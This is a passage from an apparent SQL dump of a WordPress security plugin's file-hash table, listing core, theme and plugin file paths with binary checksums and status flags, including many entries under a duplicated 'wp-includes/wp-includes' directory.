��P�{��','',0,'?'),('���J���K<V\\�|','wp-content/themes/sg-window/inc/widget-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��}��i�2�<PU�','�dӃ�Nݭ8���4B���+]&�6!��m[�','',0,'?'),('�w�]cI�w��Ȱ�H','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('����:��!>��l�','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',0,'�ۓ���G�c,��=c^�','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�7(���R�1����R','wp-includes/wp-includes/js/dist/dom.js',0,'ϗL\'n��f\\��FFE','ϗL\'n��f\\��FFE','�[J`aq�ݭNc�;���eȜR��\Z�p.�','',0,'?'),('�E#l��L��_&ܪ���','wp-admin/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�$�>����>�Y','�YW��(��N3�2U;�����<.iDd!��','',0,'?'),('�H �%9���l�ԅ�E','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�O�I�����Iԥ{','9YZ��A}7�=��:�\'Fo�G�\'�R�ɹ�_-','',0,'?'),('�Hej�l�E�9$�','wp-includes/wp-includes/user.php',0,'�λ���4S�����','�λ���4S�����',' BN+3Yj��}�Te�:�g\0t&�*�Į�i�','',0,'?'),('�Myt}Uc8���O�','wp-includes/wp-includes/js/plupload/handlers.js',0,'O��	�~�5��8�ͫ;�','O��	�~�5��8�ͫ;�','�	�\n�Z\rZ�B�[9��z��S)��4M%��','',0,'?'),('�U��n�/|r@ڪ��','wp-content/wflogs/config.php',0,'NJ��0ú!d����)o','NJ��0ú!d����)o','iS�\\�8llK�[@��1S�]�uT=�٦�]�','',0,'?'),('�js��w2��p��qS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��A��a�<�ά','�9ti?L\r���E��-,�*���<�a\\=�i�a','',0,'?'),('�s}�Ƕ�)�T�V��','wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�~_کk_�l\n��','�vC.z-�N�Y���	�C�<����ccl','',0,'?'),('�s�G������S4�','wp-content/plugins/wp-cerber/assets/flags/ca.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�1���I��;pl�s�','��Bx���zU�O.�.t��XB�@ͤ��%��','',0,'?'),('�{ڭd3T�Xy����7;','wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�܀	���,玒�[�','F��L5�%��$�e��&q�(����W-n)�m\'','',0,'?'),('�}��e��C��!�*','wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('Ӂ�K�|��pB��w�k','wp-includes/wp-includes/js/jquery/ui/effect-bounce.js',0,'�;B� ��GYQ�n�ߴ','�;B� ��GYQ�n�ߴ','���m/�g|ڶ\\���e(�>6��\n�-G!�\0','',0,'?'),('Ӄ+�.\"�S77L','wp-content/themes/shootingstar/functions/about/images/body_bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\nh��4�_m','�4\"b@�L�$t�~L���\Z���}g��N�u2','',0,'?'),('ӟ���my�+\nf�:','wp-includes/js/wp-api.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('Ӣ<i�9-^��@� �{�','wp-includes/wp-includes/js/admin-bar.min.js',0,'�၈��n�&�a1a\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('Ӥ����ǕL�F��ZQ','wp-includes/css/dist/block-library/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�D�P�y��n�\\B�','�AQY��tQ�aK	hˤ�+\r�+�x,`⵽�','',0,'?'),('ӭ����|����z`\\�','wp-includes/wp-includes/images/smilies/icon_evil.gif',0,'�^��M�>�z��','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('�Ҡ�5�������i*Ǡ','wp-content/plugins/wp-cerber/assets/flags/ms.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֠��G/�������Ҳ','�cZ��/�n�[�`��=\Z4�~��+�)%�k�','',0,'?'),('��I7߇S�2�&���','wp-admin/erase-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^g�v~�9Qu�i�\r�','+���ƱO�N6���,�F���]�ڷ�O��/','',0,'?'),('��K��7ڋ����+','wp-content/themes/sg-window/img/0.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+ٴ	?������','bz#���ht�7Z���}S�u`�Ł��/','',0,'?'),('�\n}l�uxR�i�&��','wp-includes/wp-includes/js/dist/vendor/moment.min.js',0,'d\"��\"M��aM�w�M','d\"��\"M��aM�w�M','O��m��y���6ۆ�x`R0Nh[7\0]�%�ʞ','',0,'?'),('�A��l�an���=3p�','wp-includes/wp-includes/images/crystal/text.png',0,'�� Ѳ��#�d�%�[�','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�].�oo�ȦM-n	�','wp-admin/images/align-none-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XC�)[���-�4�','�ߧ&QQ�p\"~�\Z8S׊����Y����S`','',0,'?'),('�~�7W��`K)�y�\0','wp-includes/wp-includes/meta.php',0,'�6y��w���N�ш','�6y��w���N�ш','���W!�\Zس-�Y��}����M��W�e?','',0,'?'),('ԛ�a�����tr��','wp-includes/blocks/video/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�P=C�g �\'L�','g��G�a$�E������˘UQbyħ�+','',0,'?'),('Ի�K��\Z��y`mQ	�','wp-includes/wp-includes/class-wp-admin-bar.php',0,'�~�;1�q�h��Nu�','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('�Ȇp���]4��L��q�','wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�t_K��ᕮ��','�ذ�ǶQF�bA\"��G+c��i��1 /�wǧ�&','',0,'?'),('��p��S��`�]T]D�','wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�̆lҘ�\\�4�,C-�m','wp-includes/css/dist/block-library/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0>>�~��u��WlY','�\n�:�n�ޒY�Z�[�I	���g\0�����a�B','',0,'?'),('��gjGA��V�\0�','wp-includes/wp-includes/js/twemoji.min.js',0,'���װ�aL/S��T','���װ�aL/S��T','e�dimԺm\Z$V��v�%	���FO��aK\rŇS','',0,'?'),('���/�q��RR�|���','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���!z@;�Ve����','�#��l�#�к;�	KAH9Q�@�	����B~�','',0,'?'),('������IE��','wp-content/themes/sg-window/img/icons/small/livejournal.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʡ��\r��\"E��','���>T\0S=�L.E��?����%���k��','',0,'?'),('�X��$�a��B��^','wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝ̢����VN3����','cm[Tl5����Qy;��w0��N!<��/躬�','',0,'?'),('�\Z3	b�ws0{/!Bm�','wp-content/plugins/wp-cerber/assets/flags/lu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#x�I���@K���','��f\0�4����;)��x�6ҽՖx�&X��w�v','',0,'?'),('�0�8E{8_�P�`�� ','wp-includes/wp-includes/js/dist/html-entities.min.js',0,'x�l��m7��#��F','x�l��m7��#��F','�z�d��q�ٻ�ٿ���	l���w�5�M�','',0,'?'),('�BImS��96�7���X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�G�M�!ex9��','�!ZgbZ��FZ���z����|�YE�	���','',0,'?'),('�gֿ��m�㋣��I','wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ot�]�����','	[� ��G9<b*d}\r<���k�����\n��6��','',0,'?'),('�p�sZZ�#�N7��e�','wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�E\"�LL��Z�R�D','�l�z<jW���Jzh��OKG����ğ�e�','',0,'?'),('�uG#�)�|�^���6','wp-includes/Requests/Exception/HTTP/511.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','un�N<Kw�Л����@','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('Շ\n!B|rC����','wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php',0,'<�\0W>$����l�^ҳ','<�\0W>$����l�^ҳ','Qy(u�&���v�ӳ\'-�}�hՒ��X��t�','',0,'?'),('Ջ���ָ^Rj��ś','wp-content/themes/sg-window/page-templates/right-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��day���n�Q�','k���N����%���~��DQ�5�	�u�U�� ','',0,'?'),('ՙ�5qV��#Y�','wp-content/plugins/wp-cerber/assets/flags/ro.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�N����C�Eѩ-�','�J7d[�^k`�\0v�?ł�;%`a[)','',0,'?'),('�ՏC݀�Q)�8��8�','wp-includes/wp-includes/Requests/Hooker.php',0,'�@%�a[ў/4��','�@%�a[ў/4��','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�K2;�<D����kub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���1_�e�k2R����','j�颎����_c�632�3օ�]Gs}.\n','',0,'?'),('���ͤ6�\0/��k���','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�$������42��','\"WV����ь�� /�J4J@��Hq�Gж�','',0,'?'),('��1�*Ui[�8�^�=','wp-includes/wp-includes/class-walker-comment.php',0,'I#�h�Z~�����@��','I#�h�Z~�����@��','�Xs�W��l����:\"��0����;����LL','',0,'?'),('�R�|1�cr)��*','wp-includes/wp-includes/js/admin-bar.js',0,'�\r�c����@p�','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('�!V������<k�,o�','wp-content/themes/sg-window/functions.php',0,'B��-���˨��8','B��-���˨��8','�Ŧ5I�P�����6v�(Li��)�&Q�d�0H','',0,'?'),('�<������$�h�','wp-includes/wp-includes/js/jquery/jquery.masonry.min.js',0,'��@`���&n|�}A��','��@`���&n|�}A��','�\\ۙ����	}M�g� �$�0� [���B','',0,'?'),('�Xډ|�8���}�B�','wp-includes/js/tinymce/plugins/link/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('�Z�	r!ޏf���	�','wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�oҨ*K��o�7{� <','wp-includes/ID3/module.audio-video.matroska.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('�rY�S�xwDY˚J�[','wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R׬˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),('�t�Q��oi�:��\r�','wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',0,'\'�U巃�� qD�F��H','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('�v��&�M�|=��h`�','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js',0,'El�*Ie��NZ�aK��','El�*Ie��NZ�aK��','�K�+|���̫M5J�����y�0�It�lol','',0,'?'),('֋�8�[�����0�ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɖ9�/Y������','[γ�s	`�A���;�y_���<��X�\Z�%Y�','',0,'?'),('֌��q�ó�X�[���','wp-includes/class-wp-feed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~��܏�4��','',0,'?'),('֤ɕXD����dq','wp-includes/wp-includes/SimplePie/Registry.php',0,'���\\���S8�X�`Yt','���\\���S8�X�`Yt','5\n֚�8��q�W��@��C�HҘ���\\eg','',0,'?'),('ֶ��9؞f�po3t','wp-includes/class-wp-admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('ֿ�PХ��l�H�/Й�','wp-includes/wp-includes/js/dist/block-library.js',0,'�INo<�Rz�I����','�INo<�Rz�I����','�Op�2�j�|:,��a:�weҽ�H�S�/�.','',0,'?'),('��J��!�[W6ݧ�','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�w�VX�8��~$�','����%����m���򳚫-[�\0:�&��','',0,'?'),('���B��W���k\rZ{��','wp-includes/sodium_compat/lib/ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5\\S���z���','�\0h���=�`]U3�g��殼4%1��9x�*�','',0,'?'),('��<��b�XUM�@\\!','wp-content/plugins/wp-cerber/assets/flags/pt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8��,t7s\'��=K^','qd<Q\Z�fe�-�	%�7��5[�1�+i�uG�','',0,'?'),('��ײl.#)iD���','wp-content/themes/sg-window/img/icons/small/digg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�һ���C =�','�,���5�]+��l�,��n@���A1B�:���','',0,'?'),('���΀y\"���=]�4�','wp-includes/wp-includes/js/autosave.js',0,'\0|w{���5l�D\nө��','\0|w{���5l�D\nө��','����U��m�����vk�}�n��V�#IH�','',0,'?'),('�Gȩ��6����\0Y','wp-admin/includes/class-wp-posts-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m	�(�J\Z+x��,�','8�t�Ä���W�#��ښ�̟�+_@C����','',0,'?'),('�I�	J��a~R��Z�','wp-admin/includes/class-wp-application-passwords-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��\\�б�(�\"��E','}|N�on-����q(\\��F�SX�i\'��$','',0,'?'),('�M\0���c����_d�','wp-admin/includes/class-file-upload-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��;>�x�Z�s�6','[\"o�^�.q`Oצ��v��<���Q�+FM�4��','',0,'?'),('�f�k[x���� \\�/Y','wp-includes/js/dist/redux-routine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�����4���s0_�\\','>��eY�;� ��طF�-��@�?|��!W�Xs','',0,'?'),('�w�h]�á�&�wM��','wp-includes/class-wp-network-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('מ�y�7mE5���O_�','wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���NX���\\m��','P��[H{lW�@\0!�!��s�_�/j�F�Č�','',0,'?'),('�Ć��c��ij�B;�','wp-content/plugins/wp-cerber/cerber-pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\%�9��,\rY\Z�+N','\"�&��=+�3ʰ�;��\r�I[h�NY���','',0,'?'),('��j0���w�E}®R�','wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Upʓ�H�WtP!�H','�^���E-�R�����\'#?�le��mL0�kU@�','',0,'?'),('��M|qΚ���SW�','wp-includes/wp-includes/SimplePie/Decode/HTML/Entities.php',0,'��jыp&y������U','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('���x$��:��D��\\','wp-includes/wp-includes/Requests/Exception/HTTP/405.php',0,'�8т�m!�Ҭ����','�8т�m!�Ҭ����','j�b�횄��^U�sv8�$b����M�3y�','',0,'?'),('��^�u����}�G��','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��΁~͟��ak��','u\Z�g$}o����bĄ��+\r��\n���8�','',0,'?'),('�����C|���Pf��','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),('�q�`Z�\Z�xu��','wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php',0,'��-r�jiI�أe�b','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('��\Zv�I:wm�\'~K-','wp-includes/ID3/module.audio-video.riff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('�%tb���BH0�<T','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',0,'�%�X�������`йKZ','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�&�Zh�$�Éo�','wp-includes/class-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kE\Z�[Z����䰱�','�D����t��5��^	�σ�7�2��7�{','',0,'?'),('�8/B��$8���`m�','wp-includes/js/imgareaselect/jquery.imgareaselect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('�<5�:[v3Y� �$�:','wp-includes/wp-includes/ms-default-constants.php',0,'&�%�M�A�b���Y�','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('�A�h)I�\Z]Gr��E','wp-admin/includes/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�m�|�<��(`�','6\r6\r�@�u<�z(�_�����0�v�*�','',0,'?'),('�J=R\'���t^�}�\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��H','n�p��ʅ���G��0�6Kq�J]����J�','',0,'?'),('�M&�3\r�3CMaQ{','wp-admin/images/yes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��7܉�\rqZ�Qk','�=�Q��G���9%�K���,�\r�\ZF�y���','',0,'?'),('�b�����F�rI0��','wp-includes/wp-includes/Requests/Exception/HTTP/502.php',0,'|�:l��z��!{�G�i','|�:l��z��!{�G�i','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),('�g6��\'R��K�o��','wp-includes/wp-includes/images/smilies/icon_biggrin.gif',0,'�K��Jr��:�]kI�|','�K��Jr��:�]kI�|',':������ٔ���M����X%	�<8�g4�','',0,'?'),('�o�ǣ�	ף�f0�Y','wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('�v����\r�&X��','wp-includes/js/jquery/ui/selectable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('�x��βЦ��A	�<�','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�R`�����9|�e','U�͊�s��ds�9;�C�O���Ȥ�@','',0,'?'),('ؠ��^y������v�','wp-includes/wp-includes/js/jquery/ui/autocomplete.js',0,':dL�*�E�&*!',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('ر�-�_}Z�h��\n�\Z','wp-admin/includes/class-walker-nav-menu-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��H�Y��SAK�k�\n�','�M��$N}�IF��)M����`\r�c�*�Q4��\'\n','',0,'?'),('ط�;����\0���','wp-content/plugins/wp-cerber/assets/flags/cy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�o||/$�B���l','븻�Òc���.\"��0C�i+\Z�\Z�{pċ����a','',0,'?'),('ؽ�)��uҶ�ew��l','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mhOല�f�.I','�o�O�b�9_��b�-4��-�x%�T���5E9\'�','',0,'?'),('��\\�12%���=6��','wp-content/themes/sg-window/inc/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Tw����%\'p\r�','jt�^�>v;4��]�T�8ʨ3�R�ia���g','',0,'?'),('�φ{)�e]�ŝ�4ܴ�','wp-content/plugins/wp-cerber/assets/flags/sc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���\'hz�\Z�uR�m�','1W��b�[^\'�J�Z�O��\0.\n )����','',0,'?'),('��ҡ���K%����^�','wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B%��	׻FQe(t','��	j뾸�g���>`�Z�C�\nb3<���w','',0,'?'),('����\"�[^Pư','wp-includes/wp-includes/blocks/calendar/block.json',0,'��Y��P#����(i�','��Y��P#����(i�','�D���]^��~��>�r~]�E^anK-qHMe�','',0,'?'),('�\n�������y��','wp-content/themes/sg-window/img/1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0>I��1\\��eO�','k��Xu � �g��A��I��8�[{5�<�','',0,'?'),('�-h\n\r`��ýەC/s','wp-includes/class-wp-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\'\'��UQ�|4��','F�7��������S�1�\Z�`#�4�\rHsL\n','',0,'?'),('�,(�i7:^�^�#','wp-includes/js/tinymce/plugins/paste/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�4�_����Gw','wp-includes/wp-includes/Requests/IDNAEncoder.php',0,'�}��2����P�ر','�}��2����P�ر','�M?�~\"��u%�[�,�l����+?F-}�M)�','',0,'?'),('�>��[�ұE�D�;�','wp-includes/block-patterns/three-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ǟ�(	aL�)�m','\r��)��k���O�dS0�X�z���_����','',0,'?'),('�@�_��E#�]b��^~','wp-content/themes/sg-window/img/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�{I�X���s�s���','`�K�rБx`�3o&;\0�}��g��5�o^�','',0,'?'),('�J��^\Z7��uG�k+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�_<���-1�__I��u','�%d����d��_�\01@TY�$����A','',0,'?'),('�d��%3��Z�4��_+','wp-includes/css/dist/edit-post/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{J����3=�f�','w��ko����xv&Aޭ�� T�gޗ���','',0,'?'),('�k��/y�����&��G','wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('�l;ao��~�G��','wp-includes/Requests/Exception/HTTP/501.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eڸ04�-?��ב�5','�k�G寲�\n΃CD#�6�u\Z�քEڣ@K1','',0,'?'),('و�TĖhx~Dt>l�','wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#g@�ۘΑc�Y<χ�','-ND�Ya�ƖǤ5	]�ݡ�pat�L�]��\Z','',0,'?'),('٘�\"P�ܞ��,���','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('ٺ��2ڑ�D��,�#�','wp-content/themes/sg-window/img/icons/small/google.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ō) \Z6�������','��۩8�ئf�&0\Z`\'��`���|�v�|o','',0,'?'),('��{��]]��R�\n]','wp-content/plugins/wp-cerber/assets/flags/md.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z6>�x��D�\ZL/x\n','���[Ρj*�Z�\'��ӛ�U!Wa�����\\','',0,'?'),('��3��I�98\\�֛�[t','wp-includes/random_compat/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L	�L�M�ʫ�)�','',0,'?'),('��!}�=�`*�gZ=','wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ь�ԥ�d�o|��ܪ','��%�v׫\0���\r��΋��:c��GO���','',0,'?'),('��Z���\\�Ze','wp-content/themes/sg-window/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1;��<�S$�ӏ���','D1]ʺ,A�g�M?�u�����w�I�X�z���;,','',0,'?'),('�VBǡ��\Z�B\"\0��','wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('�>�~�!�g�q��','wp-includes/js/tinymce/skins/lightgray/skin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��B���&�pw�','7>xV&v|­��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('�\r��Be�ׯE�7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y}���`8v�FJ','�U��߆(�[�r嵳��g���h��嬵!m9(\"�','',0,'?'),('��w�=Ţ�O�&�F�','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍���|DW��!E�4','S��o�Gp����{���\"�FuS�&�����','',0,'?'),('�q\n{Kg�k��6�','wp-includes/wp-includes/js/imgareaselect/imgareaselect.css',0,'}(��()��3���󵕯','}(��()��3���󵕯','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('�\'��7��b��~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�,\r��	�g�H�6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','᪟L֍6����\0��W','�\0�6�3^r1�l�9cqY�p�h�Okl�\r�K','',0,'?'),('�/l�M�7\Zɕy�r��','wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php',0,'g�b�f>���=���','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('�2�6,̞|ke�L\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)�h\\ h�G�8�','C�%�0�z)f ����@�t>��ɶ{T��8�o�','',0,'?'),('�D�$Q#5Ұ�	�','wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css',0,'���;.�K� Ld�-�','���;.�K� 